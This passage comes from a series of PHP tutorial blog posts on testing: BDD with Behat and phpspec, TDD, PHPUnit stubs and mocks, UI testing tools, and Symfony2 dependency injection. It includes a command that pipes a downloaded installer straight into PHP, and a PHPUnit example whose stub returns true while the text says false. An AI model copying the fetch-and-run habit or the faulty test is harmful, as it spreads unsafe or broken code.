When I submit the form "ul.form-block > li:last > #submit"
And I wait until the page is fully loaded
Then I should see "You've registered successfully"
The thing is, you're not describing the business value in this acceptance criteria. You're describing User Interface (UI) interactions. And that's completely different!
So here's my rule of thumb: don't use Mink nor Selenium. In Silex, an implementation detail, the advice given is: imagine you need to add a CLI which shares the same functionality as the web interface. It would be a shame to have to re-write all your acceptance tests, wouldn't it?
Behat enables you to make your acceptance criteria executable, and automates the process. Awesome!
If you're using Selenium, or the Mink extension, then you're doing it wrong: don't test the UI, test the business value.
Here's my workflow advice:
I hope you enjoyed this article, be sure to tweet me what you think about it ;) .
Story BDD and Behat have a steep learning curve, which makes them hard to practice in the beginning (but totally worth it). To help you find your own way, here's a list of references:
And of course have a look at the references from my BDD article.
]]>This article is part of a series on Tests in general and on how to practice them:
In this article, we'll talk about Behavior Driven Development (BDD), again. There are no special skills required to read on, although some notions of tests and Test Driven Development (TDD) would be a plus.
So TDD has 3 simple rules:
Like many TDD aficionados, Dan North felt that it was missing some guidelines. To fix this, he created spec BDD, which adds the following rules to TDD:
- test method names should be sentences (starting with it_should instead of test)
One of his colleagues, Chris Matts, suggested taking BDD a step further: why not make sure the business value was met? And that's how story BDD was created.
If you're working with agile methodologies, you should be familiar with user stories. Those are simple cards which describe what to do in 3 lines:
In order to attain a business value
As an actor
I need to meet some requirements
They also have some acceptance criteria, which follow approximately this template:
Given a context
When an event happens
Then an outcome should occur
If the system fulfills the acceptance test, then it behaves correctly. By making them executable, you can test the business behavior of your system! That's what story BDD is all about.
Technically, this means parsing the acceptance tests and match each line with a chunk of code. But don't worry about implementation details, we'll see them in the next article.
Somehow, a surprising number of people started to think that BDD was all about integration tests. For example in a web application, they would write:
Given I am on "/home"
When I click on "form#name_form input[name=submit]"
And I wait until the page is fully loaded
Then the "form#name_form input[name=first_name]" form field should contain "value"
What's wrong with it? Well:
Here's a better approach:
Given the opportunity to introduce myself
When I give my name
Then I should be greeted
Yep, that's the story BDD example of "Hello World", in case you didn't recognize it ;) .
If you make a user story's acceptance tests executable, then you're doing story BDD. It helps you to make sure that your application meets your business needs.
Hopefully this article helped you a little. If you have any questions, rants or praises, feel free to send them to me on Twitter.
Tests are hard. TDD is harder. BDD even more! Here's some good references to help you on story BDD:
]]>This article is part of a series on Tests in general and on how to practice them:
The last article might have seemed too abstract. Fortunately, this one will be much more concrete! We'll present phpspec, a spec BDD tool for PHP.
phpspec automates the Test Driven Development (TDD) and spec BDD process by:
It also forces you to follow good practices:
It also tries to be less verbose, as you'll see in the next sections.
Simply install phpspec using Composer:
composer require --dev 'phpspec/phpspec:~2.0@RC'
At the time I write this article, phpspec is in Release Candidate, but don't worry: I've been using it since the beta version and I've never had any trouble.
First, bootstrap and complete the specification:
phpspec describe 'Fully\Qualified\Classname'
$EDITOR spec/Fully/Qualified/ClassnameSpec.php
Then bootstrap and complete the code to make the tests pass:
phpspec run
$EDITOR src/Fully/Qualified/Classname.php
phpspec run
Finally refactor, but keep the tests passing:
$EDITOR src/Fully/Qualified/Classname.php
phpspec run
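To make the cycle concrete, a bootstrapped specification looks roughly like this (a hypothetical Greeter class, not taken from the phpspec docs):

```php
<?php
// File: spec/Fully/Qualified/GreeterSpec.php (hypothetical example)
namespace spec\Fully\Qualified;

use PhpSpec\ObjectBehavior;

class GreeterSpec extends ObjectBehavior
{
    function it_should_greet_people()
    {
        // $this proxies the class under specification:
        // phpspec will offer to generate Greeter::greet() for you.
        $this->greet('World')->shouldReturn('Hello World!');
    }
}
```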
I've found that Marcello Duarte, the creator of phpspec, talks really well about it in his presentation Test, transform, refactor.
I advise you to have a look at his slides, as they explain everything you should know about the red, green, refactor cycle.
Surprisingly, the documentation is complete and small:
There's nothing missing in these docs!
Unlike PHPUnit, phpspec uses an external library for its test doubles: prophecy (but you can still find how to use it in the documentation).
phpspec generates specification and code boilerplates for you. It forces you to concentrate on the class behavior rather than on the implementation, and it provides a non-verbose API. Even its documentation is complete and small!
I hope you enjoyed this article, be sure to tweet me what you think about it ;) .
]]>Reference: see the reference article
This article is part of a series on Tests in general and on how to practice them:
In this article, we'll talk about Behavior Driven Development (BDD). There are no special skills required to read on, although some notions of tests and Test Driven Development (TDD) would be a plus.
Dan North, a fervent TDDist, felt that there was something missing about this practice:
While being an adept of the concept, he felt that some important guidelines were missing, and that his tests didn't answer the right questions.
Around 2006, he wrote an article called introducing BDD, in which he explained his unease and how to fix it: instead of writing tests from a technical point of view he decided to write them from a business point of view.
The first step to test the behavior of a class is to write a specification. Because xUnit frameworks were in vogue, developers had the habit of making a parallel between their Systems Under Test (SUT) and their Test Suites:
Test to name the Test Suitetest to name the Test Suite's methodsIn the Software world, a lot of problems can be solved by giving descriptive names. And this is what Dan North did: Test Suites became Specification. Why? Because it forces you to say "this method should do this" instead of writting "test method".
To be more precise, Dan North stated that "test method names should be sentences", which means that test method names should be snake_cased, as underscores give more space to words (they're basically spaces).
And that's pretty much it!
Yes! Well, no. I mean... This is only the first part of BDD: it's called specBDD (guess why ;) ). I'll write about the second part (story BDD) in a future article.
BDD is just TDD, but tests become specifications and test methods are sentences which start with "it_should".
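To make this concrete, here's a minimal sketch of what such a specification could look like (the Basket class and the plain assert-based runner are made up for illustration, instead of a real BDD framework):

```php
<?php
// Hypothetical class under specification.
class Basket
{
    private $products = array();

    public function add($product)
    {
        $this->products[] = $product;
    }

    public function count()
    {
        return count($this->products);
    }
}

// Specification style: every method name is a snake_cased sentence
// starting with "it_should", describing a behavior, not an implementation.
class BasketSpec
{
    public function it_should_start_empty()
    {
        $basket = new Basket();
        assert($basket->count() === 0);
    }

    public function it_should_hold_added_products()
    {
        $basket = new Basket();
        $basket->add('book');
        assert($basket->count() === 1);
    }
}

$spec = new BasketSpec();
$spec->it_should_start_empty();
$spec->it_should_hold_added_products();
```

Reading the method names aloud gives you the class's behavior: "it should start empty", "it should hold added products".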
I hope you enjoyed this article. If you want to make any comment, you're welcome to do so on Twitter.
To keep good habits, in the next article we'll switch to the technical mode and see some phpspec!
]]>The first two articles didn't require special skills whereas the last one needed you to be a little bit used to tests. Well, the next ones will require you to be a little bit used to Test Driven Development (TDD), so this article is here to make you practice it!
I really mean it: reading articles on TDD might feel good, but the only thing to do to fully grasp them is to:
In other words: just do it! The learning curve is steep, so dive into it as soon as possible.
One of the best ways to learn is to pair with someone who's used to it. If you don't have someone to pair with, you can always read this Extreme Programming Episode by Robert C. Martin and Robert S. Koss.
The next article will be about the next level: Behavior Driven Development (BDD).
]]>Unlike the two previous articles, this one requires some experience in testing. While Test Driven Development (TDD) aficionados would tell you that, on the contrary, this is the way to learn tests, I'd rather advise you to practice them a little bit beforehand, so you can fully grasp the interest of this principle.
In this article, we'll cover:
TL;DR: jump to the conclusion.
Test Driven Development (TDD) is a simple principle stating that we should: first write a test, then write just enough code to make it pass, and finally refactor that code.
It is also described as red, green, refactor to reflect the state of the tests
after being run at the end of each step. Well, the last step should still be
green, but it wouldn't be self-explanatory if we said red, green, green, would
it?
Kent Beck is considered to be the father of TDD, even though this practice must have been used before, especially because he wrote the 'bible' Test Driven Development by Example and also because he created the eXtreme Programming methodology (which integrates TDD into its practices).
TDD mostly applies to unit tests, but it could be used for any kind of test.
Each step has a purpose, which we'll discover.
So, why would we write the test before the code? The idea behind this is to write a piece of software which will describe how to use the future code: when writing the test, you're not bothered with implementation details and will naturally create the API (the public methods).
The first consequence of this step is having a meaningful code coverage: no need for tools to inspect which lines of code are executed when running the test in order to make sure the code is properly tested (those tools aren't effective anyway).
The second one is better design: to write tests you need the code to be decoupled. Writing tests first forces you to make those decoupling decisions early. Decoupled code should be easier to re-use, read and maintain.
As depicted by Ian Cooper, this step is the duct tape programmer's one: in order to make the freshly written test pass, every sin can be committed. All design, clean code and best practice concerns should be put aside so the test passes as quickly as possible.
Why so much fuss about all this ugly code? The main reason is speed, answering the criticism about how long tests take to write.
With this, the school of pragmatic programmers and the scholarly one can finally be reunited: as a matter of fact, while this step is all about the first "clan", the refactoring step is all about the second one.
To illustrate the fact that sometimes the clean solution comes to mind once the dirty has been written, here's a quote from the Eloquent Javascript book:
A student had been sitting motionless behind his computer for hours, frowning darkly. He was trying to write a beautiful solution to a difficult problem, but could not find the right approach. Fu-Tzu hit him on the back of his head and shouted 'Type something!' The student started writing an ugly solution. After he had finished, he suddenly understood the beautiful solution.
Now that we have sinned, we have created a technical debt. The third and last step of TDD, refactoring, is all about managing this debt.
The rule here is to step back a little bit and consider how we can improve the structure of the code to make it simpler and more readable, and whether anything can be extracted to be reused.
Once this consideration is done, we can start moving the code around, on the sole condition that we don't break the tests. It also means that the tests shouldn't be modified.
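As a hedged illustration of the full cycle (the isLeapYear function is a made-up example, not taken from the article), here is what survives after red, green, refactor, with the history told in comments:

```php
<?php
// Red: the assertions below were written first, while isLeapYear didn't exist,
// so running the script failed.
// Green: the first implementation could have been a sinful hard-coded
// if/else chain, just enough to make the assertions pass.
// Refactor: the version below is the cleaned-up result; the assertions
// themselves were never modified.
function isLeapYear($year)
{
    return ($year % 4 === 0 && $year % 100 !== 0) || $year % 400 === 0;
}

// The tests, untouched through all three steps:
assert(isLeapYear(2000) === true);  // divisible by 400
assert(isLeapYear(1900) === false); // divisible by 100 but not by 400
assert(isLeapYear(2012) === true);  // divisible by 4, not by 100
assert(isLeapYear(2013) === false); // not divisible by 4
```

The point is that the assertions act as a safety net: any refactoring that breaks one of them is immediately visible.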
Writing the test first allows a complete and meaningful code coverage, more decoupled code and a more natural API (public methods).
Then, committing every sin to write the code that makes the test pass as quickly as possible speeds up development through pragmatic decisions.
Finally, refactoring without touching the tests allows you to get rid of the technical debt created in the previous step, depending on the estimated time left for the task.
Unfortunately TDD comes with a quite steep learning curve, but hey! You don't get something for nothing!
I hope you enjoyed this article, if you'd like to make any comments about it (either good or bad), please feel free to do so on Twitter.
There have been many criticisms of TDD, and most of them are simply misconceptions. If you're part of the sceptics, check if your argument is listed in Jason Gorman's article.
The next article is about actually doing TDD.
]]>This article can be read by any regular developer (no special level required); we'll put some code behind the principles we've previously seen and take a quick look at existing tools. Here's what we'll cover:
TL;DR: jump to the conclusion.
In order to automate your tests (whether they're unit, functional or anything else), you'll need some tools. These would be libraries helping you make assertions, libraries helping you create test doubles without writing any new classes, or even frameworks which group those libraries together.
Most test frameworks follow the xUnit convention, which was (accidentally?) created by Kent Beck. Those are composed of a TestCase class to extend, assertion methods, setUp/tearDown fixture hooks and a test runner.
Those are, among a ton of others:
You could also find Behavior Driven Development (BDD) style test frameworks:
I won't talk about these, as it will be the subject of a future article (there's so much to say about them).
Full stack frameworks aren't the only things around to help you write tests; there are also some libraries:
Choose your weapon wisely!
I mainly code in PHP, and in this language PHPUnit is the most popular test framework. It's been there for so long (version 1.0.0 was released in July 2006) that almost every library and framework is tested with it. So it'll be our tool for the next examples.
You can install it using Composer:
curl -sS https://getcomposer.org/installer | php # Download composer
composer require "phpunit/phpunit:~3.7"
php vendor/bin/phpunit -h
Note: if you don't know Composer, let's just say that it makes your life easier by downloading the libraries you tell it to (it takes care of selecting the right versions and can update them to get bug fixes). It also autoloads your classes so you don't have to require them.
Now that you have the latest stable version, you'll need to configure it:
<?xml version="1.0" encoding="UTF-8"?>
<!-- File: phpunit.xml -->
<phpunit
backupGlobals="false"
colors="true"
syntaxCheck="false"
bootstrap="test/bootstrap.php"
>
<testsuites>
<testsuite name="Fossil Test Suite">
<directory suffix="Test.php">./test/</directory>
</testsuite>
</testsuites>
</phpunit>
This configuration tells PHPUnit to look (recursively) in the test directory
for files ending in Test.php. Those will be your test suites.
You'll need a bootstrap file in order to use composer's autoloader:
<?php
$loader = require __DIR__.'/../vendor/autoload.php';
$loader->add('Gnugat\\Fossil\\Test', __DIR__);
And voilà! You can now write your tests in the test directory.
The common understanding of unit test is a symmetry between classes and tests: when you have a class with 2 methods, you need to have a test class for it which will test these two methods.
It looks like this wasn't the real meaning of the term unit, which should have meant tests that can be run in any order, as many times as wanted, without breaking each other. Fortunately, a new kind of test was created to fix this misunderstanding, so let's stick with the common meaning.
Imagine you have the following class, which creates a file if it doesn't already exist:
<?php
// File: src/MarkdownFile/DocumentationWriter.php
namespace Gnugat\Fossil\MarkdownFile;
use Symfony\Component\Filesystem\Filesystem;
class DocumentationWriter
{
private $filesystem;
public function __construct(Filesystem $filesystem)
{
$this->filesystem = $filesystem;
}
public function write($absolutePathname, $content)
{
if (!$this->filesystem->exists($absolutePathname)) {
$this->filesystem->dumpFile($absolutePathname, $content);
}
}
}
Note: once again the code samples are taken from fossil, have a look at this article to discover what it is.
In order for it to be autoloaded, you'll need to edit your composer.json file:
{
"require": {
"phpunit/phpunit": "~3.7"
},
"autoload": {
"psr-4": {
"Gnugat\\Fossil": "src/"
}
}
}
To test it, we could run it and check if the file has been created with the
given content, but that would be testing Symfony2's Filesystem which
happens to be already tested.
So what does our class add to it? Well, it calls Filesystem to check if the
file exists, and if not it calls the Filesystem again to create it. We could
check if those calls are made using stubs and mocks.
Reminder: stubs are substitutes of an object which force it to return a given value. When a System Under Test (SUT, the class you're testing) has collaborators (classes used by the SUT, also called dependencies), we can stub them so their behavior is completely controlled.
Reminder: mocks are substitutes of an object which check if its methods have been called. When a System Under Test (SUT, the class you're testing) has collaborators (classes used by the SUT, also called dependencies), we can mock them to monitor their use.
PHPUnit allows us to create stubs and mocks without having to write a class which extends the collaborator and overrides its methods:
<?php
// File: test/MarkdownFile/DocumentationWriterTest.php
namespace Gnugat\Fossil\Test\MarkdownFile;
use Gnugat\Fossil\MarkdownFile\DocumentationWriter;
class DocumentationWriterTest extends \PHPUnit_Framework_TestCase
{
const FIXTURE_ABSOLUTE_PATHNAME = '/tmp/example.txt';
const FIXTURE_CONTENT = "Hello world\n";
public function setUp()
{
$this->filesystem = $this->getMock('Symfony\\Component\\Filesystem\\Filesystem');
$this->documentationWriter = new DocumentationWriter($this->filesystem);
}
public function testWriteNewFile()
{
// Stub
$this->filesystem->expects($this->any())
->method('exists')
->with(self::FIXTURE_ABSOLUTE_PATHNAME)
->will($this->returnValue(true))
;
// Mock
$this->filesystem->expects($this->once())
->method('dumpFile')
->with(
$this->equalTo(self::FIXTURE_ABSOLUTE_PATHNAME),
$this->equalTo(self::FIXTURE_CONTENT)
)
;
// Call
$this->documentationWriter->write(
self::FIXTURE_ABSOLUTE_PATHNAME,
self::FIXTURE_CONTENT
);
}
}
In the stub: for every call (expects($this->any())) of the method exists
with the parameter self::FIXTURE_ABSOLUTE_PATHNAME, the collaborator is forced to
return false (the file doesn't exist yet, so DocumentationWriter should write it).
In the mock: a unique call must be made (expects($this->once())) of the method
dumpFile with the two parameters self::FIXTURE_ABSOLUTE_PATHNAME and
self::FIXTURE_CONTENT.
You can run the tests using php vendor/bin/phpunit and see that they pass. As
an exercise, write a second method in this test suite,
testDoesNotWriteExistingFile, with a stub returning true and a mock checking
that dumpFile is never called (hint).
I advise you to watch extract till you drop, a nice refactoring session by Mathias Verraes: in order to improve his code, he writes tests which give him enough confidence to proceed. He uses PHPUnit with assertions, mocks and stubs, so you can really see their use.
Unit tests are used in order to make sure each unit of code works as expected.
But applications aren't just about code, they're also about interactions
between these units. This is what functional tests are for: they use the entry
point of the system and check the final status code.
To illustrate this, we'll still use PHPUnit: even though there's the word unit
in its name, this test framework allows us to write many types of tests.
The Symfony2 web framework is all about the HTTP protocol: it takes an HTTP Request and returns an HTTP Response. It also provides a convenient client which simulates HTTP Requests, allowing us to easily write functional tests:
<?php
// File: src/Acme/DemoBundle/Tests/Controller/DemoControllerTest.php
namespace Acme\DemoBundle\Tests\Controller;
use Symfony\Bundle\FrameworkBundle\Test\WebTestCase;
use Symfony\Component\HttpFoundation\Response;
class DemoControllerTest extends WebTestCase
{
public function testIndex()
{
$client = static::createClient();
$client->request('GET', '/demo/hello/Fabien');
$this->assertSame(
Response::HTTP_OK,
$client->getResponse()->getStatusCode()
);
}
}
The assertSame line is an assertion: it compares the expected value (first
argument) with the actual one (second one). PHPUnit provides many assertions:
assertSame is equivalent to === (type and value comparison), assertEquals is equivalent to == (loose value comparison) and assertFileExists checks if the given filename corresponds to an existing file.
Different approaches exist with assertions; for example jasmine uses the
expect method to set the actual value, chained with a matcher like toBe
which takes the expected value:
describe("A suite", function() {
it("contains spec with an expectation", function() {
var expectedValue = true;
var actualValue = true;
expect(actualValue).toBe(expectedValue);
});
});
In this case, assertions are split into expectations and matchers.
Back to our sheep. Here's an example of a functional test for a Symfony2 command:
<?php
// File: src/Acme/DemoBundle/Tests/Command/GreetCommandTest.php
namespace Acme\DemoBundle\Tests\Command;
use Symfony\Component\Console\Tester\CommandTester;
use Symfony\Bundle\FrameworkBundle\Console\Application;
use Symfony\Bundle\FrameworkBundle\Test\WebTestCase;
use Acme\DemoBundle\Command\GreetCommand;
class GreetCommandTest extends WebTestCase
{
public function testExecute()
{
$kernel = $this->createKernel();
$kernel->boot();
$application = new Application($kernel);
$application->add(new GreetCommand());
$command = $application->find('demo:greet');
$commandTester = new CommandTester($command);
$commandTester->execute(
array(
'name' => 'Fabien',
'--yell' => true,
)
);
$exitSuccess = 0;
$this->assertSame($exitSuccess, $commandTester->getStatusCode());
}
}
Just like with a controller where we check the HTTP Response's status code, in a command we check the exit status code.
Up until now, we've been testing that the code works and that interactions between all those units go well. But what about the thing the user actually sees and interacts with?
The User Interface (UI) turns out to be tricky to test, but not impossible. You can click on buttons, or load pages, or run CLI tasks programmatically and you can inspect the standard output or the HTTP Response's content.
The main problem with this is that you'll tie your tests to the UI, which changes a lot.
We'll see briefly the tools available and then better explain the flaws of such a technique.
Selenium allows you to open a browser and simulate interactions with the page. Technically it means having a Selenium server running in the background, and using a webdriver library in your test to send messages to it. In PHP, you can find these webdrivers:
You can find code samples in the respective documentation of each library, for example here's the doc describing how to click on a button with Alexandre's one.
If you're curious, here's how to use Selenium with another test framework: Codeception.
You don't like the idea of running a server in order to run your tests? You don't want a browser to be opened and you find it too slow?
Then you might want to try a headless website testing solution like CasperJS. It's headless because it won't open a browser to run the tests.
Here's the get started documentation, so you can have a quick look on how to use it.
Simulating a browser is too much for you? Making a curl request and parsing its response would be sufficient for your needs? Then have a look at the Goutte web scraper.
This one also allows you to click on links.
One Tool to rule them all, One Tool to find them, One Tool to bring them all and in the webness bind them
Mink can use either Goutte or Selenium as a driver to interact with the UI. Its goal is to provide a unified API.
The thing in common with all these tools is that they rely on the HTML rendered
in the HTTP Response. In order to check if a message appears, you'll have to
crawl the page, find the div using its class or id with a CSS selector, or even
worse using its XPath.
When the page changes (and it will), your tests will break. There are some best practices out there, mainly making your tests rely on IDs on one hand and making your code and stylesheets rely on classes on the other, but in the end it still is a risky business.
Well, that's my opinion, and this section might be more of a rant than an objective description. To counterbalance it, here's a nice article on writing reliable locators for Selenium and WebDriver tests.
In PHP, PHPUnit is the most popular test framework and it allows you to write unit, functional and every other kinds of tests.
Unit tests allow you to make sure each function returns the expected output when given a set of fixtures, and functional tests are used to check the status code (think HTTP Response, or a command's exit status).
Stubs are used to force a collaborator's method to return a wanted value, and mocks are used to check if a collaborator's method has been called.
Selenium is the most popular tool to test the User Interface, which is done by interacting with the HTML rendered in the HTTP Response.
I hope this article helped you see how each kind of test is written. The next one will be on Test Driven Development, a practice where tests are written before the code: TDD.
If there's something bothering you in this post, or if you have a question, or if you want to give me your opinion, be sure to do so on Twitter ;) .
]]>This introduction can be read by anyone (no special level required) and it targets those who've never heard about tests, or those who've never really practiced them. Here's what we'll cover:
TL;DR: jump to the conclusion.
A test is a way to check if part of the system is working. Let's say you just
wrote the strlen function: it takes a string as argument and returns its
length. To make sure it works correctly, you might have created a script file
which looked like this:
<?php
echo strlen('We'); // Should print 2
echo strlen('are'); // Should print 3
echo strlen('the knights'); // Should print 11
echo strlen('who say "Ni"!'); // Should print 13
This script (which you might have thrown away once satisfied with the printed result) is a test. It makes sure your function works correctly by providing it with different inputs and comparing its output with the expected one.
This test is not really efficient, but it does the job. Let's see how to improve it in the following sections.
Tests can be grouped under 3 categories: manual usage, written test plans and automated tests.
The first one is when you use your software to see if it works correctly. This is the worst kind of test because systems can be so complex that some parts will eventually be forgotten, and therefore not checked.
Incidentally, this is what happens everyday when users use your product, except you're not sure if they'll report the bugs they see (and for each bug discovery you can potentially lose them).
Why do I mention it, if it's so bad? Because it's still useful to discover bugs in parts which haven't been correctly covered by the other kinds of tests. Actually this is the kind of test done during beta-tests: you get a restricted set of (volunteer) users to use your product and see if everything is fine.
Let's take a scientific approach to the first kind of tests by writing test plans which describe use cases with their expected outcome.
Every time someone tests the system, they follow the scenario given to them. This is an improvement over the previous approach, as there's less risk of forgetting a step once it's written down.
Those tests are generally followed (more or less rigorously) during acceptance testing at the end of developments by the customer or product owner or even better by Quality Assurance (QA).
The problem with the two previous categories is that they require humans, and to err is human. The software industry was partly created to automate repetitive tasks, so how about we automate those tests?
The simplest way of automating test is to use assertions:
<?php
$input = 'We are no longer the knights who say "Ni"!';
$expectedOutput = 42;
$output = strlen($input);
echo ($expectedOutput === $output ? 'Test passes' : 'Test fails');
If you keep this script, you can run it regularly, which means the risk of forgetting a step is almost zero! I say almost because the test doesn't magically cover every use case: humans still have to write them, which leaves a small room for errors, but this is the best we can do.
As you can see, automated tests are constructed very simply: an input (the fixture), an expected output, a call to the code under test and an assertion comparing the actual output to the expected one.
We've seen the 3 big categories of tests. But that's not quite it: whether it's automated or not, your tests can target many levels/layers in your application:
Note: this classification has been taken from Jean François Lépine's slides
Each of those tests can be executed manually, or can be automated.
There are so many types of tests out there, and so few of us to write them! Depending on your team, competences, project and planning, you won't be able to write every possible test.
I'm afraid you'll somehow have to choose which kind of test is more suitable for your project. As a matter of fact, testing everything isn't wise:
<?php
class User
{
private $name;
public function __construct($name)
{
$this->name = $name;
}
public function getName()
{
return $this->name;
}
}
// Is this test really useful? I think not!
$input = 'Johann Gambolputty de von Ausfern -schplenden -schlitter -crasscrenbon -fried -digger -dangle -dungle -burstein -von -knacker -thrasher -apple -banger -horowitz -ticolensic -grander -knotty -spelltinkle -grandlich -grumblemeyer -spelterwasser -kürstlich -himbleeisen -bahnwagen -gutenabend -bitte -eine -nürnburger -bratwustle -gerspurten -mit -zweimache -luber -hundsfut -gumberaber -shönendanker -kalbsfleisch -mittler -raucher von Hautkopft of Ulm.';
$expectedOutput = $input;
$user = new User($input);
$output = $user->getName();
echo ($expectedOutput === $output ? 'Test passes' : 'Test fails');
In the above code sample, we're testing that the getter returns a value which hasn't been modified. Sure, you could introduce a typo while sketching the class, but once you've manually tested it a first time, there's no need to regularly check that it still works in the future.
You may not be able to write every possible test, but writing some tests will still save you time in the future as it will prevent regressions: the software industry is an industry of changing requirements, which means your code will eventually be changed, adapted and sometimes completely re-written.
Tests will allow you to change the code with a light heart, because if your change breaks something, you'll know it simply by running your tests.
Chances are your system is composed of parts which interact with each other: your functions call other functions, your classes depend on other classes and use external functions, etc.
What if the part of the system you want to test interacts with a database, the filesystem and also uses a randomizer? Yep, that's right, a randomizer: how can you even write the expected output if it's supposed to be unpredictable?
The solution is quite simple: you should isolate the part you want to test. To do so, you can use test doubles: the practice of replacing the dependencies of this part with objects which behave the way you tell them to.
There are many kinds of test doubles; fortunately Martin Fowler has summed them up for you as follows:
Dummy objects are passed around but never actually used. Usually they are just used to fill parameter lists.
Fake objects actually have working implementations, but usually take some shortcut which makes them not suitable for production (an in memory database is a good example).
Stubs provide canned answers to calls made during the test, usually not responding at all to anything outside what's programmed in for the test. Stubs may also record information about calls, such as an email gateway stub that remembers the messages it 'sent', or maybe only how many messages it 'sent'.
Mocks are what we are talking about here: objects pre-programmed with expectations which form a specification of the calls they are expected to receive.
In practice you'll use stubs to specify the return value of a dependency, and you'll use mocks to check if a dependency's method has been called. The simplest way to create stubs and mocks is to write a class which inherits from the targeted dependency and overrides its public methods.
Note: the part you want to test is called the System Under Test (SUT), and its dependencies are called collaborators.
Did you notice I used the word dependency in this section? That's because in order to make a class testable, you need it to be as decoupled as possible from its dependencies.
You won't be able to easily replace dependencies which are created inside the part you want to test. The simplest way is to inject them (pass them as arguments) to your class, allowing you to decide what should be injected: the real dependency, or one of its stubs (or mocks).
This is why Dependency Injection is a big deal. If you don't clearly know what this design pattern is about, I advise you to read this article.
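As a sketch of that idea (the class names are invented for the example), the collaborator is injected through the constructor, so a test can substitute a hand-written stub that inherits from it and overrides its methods:

```php
<?php
// Real collaborator: imagine it makes a slow, unpredictable network call.
class WeatherService
{
    public function getTemperature($city)
    {
        throw new \RuntimeException('No network access in tests!');
    }
}

// Hand-written stub: same API, canned answer, fully controlled by the test.
class WeatherServiceStub extends WeatherService
{
    public function getTemperature($city)
    {
        return 21;
    }
}

// SUT: receives its collaborator through the constructor (Dependency Injection)...
class ClothingAdvisor
{
    private $weatherService;

    public function __construct(WeatherService $weatherService)
    {
        $this->weatherService = $weatherService;
    }

    public function advise($city)
    {
        return $this->weatherService->getTemperature($city) > 15 ? 't-shirt' : 'coat';
    }
}

// ...so the test can inject the stub instead of the real dependency.
$advisor = new ClothingAdvisor(new WeatherServiceStub());
assert($advisor->advise('Paris') === 't-shirt');
```

Had ClothingAdvisor created the WeatherService itself with new, there would be no way to swap in the stub.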
Tests allow you to make sure parts of your system work as expected, and they can be automated so you can run them regularly in order to detect regressions.
There are a lot of layers which can be tested and you might have to choose what is best for you (the wrong answer being "no tests for me, thank you very much").
Dependency Injection is the right way to go, as it will allow you to use test doubles to isolate the part you want to check.
This article had much theory in it, so the next one will be more practical with code samples, case studies and tools which will allow you to test your applications: Tools overview.
I might not have stressed this enough: tests won't magically prevent your system from failing. Your tests will only cover the parts you targeted, for the use cases you could think of at the time.
So, how to make sure your tests are enough? At first glance, test coverage might be a solution: it's a tool which will mark any line of code executed while the test is run and which will produce a report telling you which parts haven't been visited.
The biggest flaw of such a tool is that just because you called a line doesn't mean you tested it. The other important weakness is that not every code needs to be tested (for example getters of values which are not altered): the report will tell you a percentage of code covered, but it won't be able to tell you if the covered part is the essential one.
In order to know if your tests cover the critical parts, mutation testing has been invented: a tool alters random parts of your code and runs the tests. If the tests then fail, they play their role of guarding your application against regressions well.
However, these tools are not very precise, they're slow and they can't know what the critical parts of your system are...
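For illustration (a made-up example, not a specific mutation tool): a mutation tool might flip the >= below into >, and it's exactly the boundary assertion that "kills" that mutant:

```php
<?php
// Code under test.
function isAdult($age)
{
    return $age >= 18;
}

// If a mutation tool turned ">=" into ">", isAdult(18) would return false
// and the first assertion would fail: the mutant is killed, which shows
// the test suite actually guards this boundary.
assert(isAdult(18) === true);
assert(isAdult(17) === false);
assert(isAdult(30) === true);
```

A suite that only tested isAdult(30) and isAdult(10) would let this mutant survive, revealing an untested boundary.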
I guess the best you can do is TDD, which we'll see in a future article ;) .
If you're interested in this subject, I advise you to read Jason Gorman's article on code coverage.
]]>Deprecated: This article has been re-written - see The Ultimate Developer Guide to Symfony - Dependency Injection
In the previous article we've seen among other things the definition of Dependency Injection (DI) and of the Dependency Injection Container (DIC).
In this article we'll see the Symfony2's DI component which provides a powerful DIC. Here's the summary:
You don't use Symfony2? Don't worry, this article is all about using this component as a standalone library (you can use it in your CakePHP/Zend/Home-made-framework application).
DI is all about passing arguments to the constructor of an object. Because constructing all those objects might become a burden, the DIC is there to take this responsibility and centralize it.
Let's replace Pimple by Symfony2 DI component in the code sample from the previous article:
<?php
use Monolog\Logger;
use Symfony\Component\Console\Output\OutputInterface;
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\DependencyInjection\Reference;
$container = new ContainerBuilder();
// This is a parameter definition
$container->setParameter('verbosity_level_map', array(
OutputInterface::VERBOSITY_NORMAL => Logger::NOTICE,
OutputInterface::VERBOSITY_VERBOSE => Logger::INFO,
OutputInterface::VERBOSITY_VERY_VERBOSE => Logger::DEBUG,
OutputInterface::VERBOSITY_DEBUG => Logger::DEBUG,
));
// register takes the service name, and then its fully qualified classname as a string
$container->register(
'console_output',
'Symfony\Component\Console\Output\ConsoleOutput'
);
$container->register(
'output_formatter',
'Gnugat\Fossil\ApplicationLayer\OutputFormatter'
);
// You can inject:
// * dependencies which have been declared previously
// * arguments
// * parameters which have been declared previously
// * setter dependencies
$container
->register('console_handler', 'Symfony\Bridge\Monolog\Handler\ConsoleHandler')
->addArgument(new Reference('console_output'))
->addArgument(true)
->addArgument('%verbosity_level_map%')
->addMethodCall('setFormatter', array(new Reference('output_formatter')))
;
$container
->register('logger', 'Monolog\Logger')
->addArgument('default.logger')
->addMethodCall('pushHandler', array(new Reference('console_handler')))
;
$container->register('filesystem', 'Symfony\Component\Filesystem\Filesystem');
$container
->register('documentation_writer', 'Gnugat\Fossil\MarkdownFile\DocumentationWriter')
->addArgument(new Reference('filesystem'))
->addArgument(new Reference('logger'))
;
If you think about it, the construction of objects is a configuration concern: you need to define for each object its dependencies. Symfony2's DI component allows you to put all those definitions inside a configuration file:
<?xml version="1.0" ?>
<!-- File: dic_config.xml -->
<container xmlns="http://symfony.com/schema/dic/services"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://symfony.com/schema/dic/services http://symfony.com/schema/dic/services/services-1.0.xsd">
<parameters>
<parameter key="verbosity_Level_map" type="collection">
<parameter key="Symfony\Component\Console\Output\OutputInterface::VERBOSITY_NORMAL">Monolog\Logger::NOTICE</parameter>
<parameter key="Symfony\Component\Console\Output\OutputInterface::VERBOSITY_VERBOSE">Monolog\Logger::INFO</parameter>
<parameter key="Symfony\Component\Console\Output\OutputInterface::VERBOSITY_VERY_VERBOSE">Monolog\Logger::DEBUG</parameter>
<parameter key="Symfony\Component\Console\Output\OutputInterface::VERBOSITY_DEBUG">Monolog\Logger::DEBUG</parameter>
</parameter>
</parameters>
<services>
<service id="console_output"
class="Symfony\Component\Console\Output\ConsoleOutput">
</service>
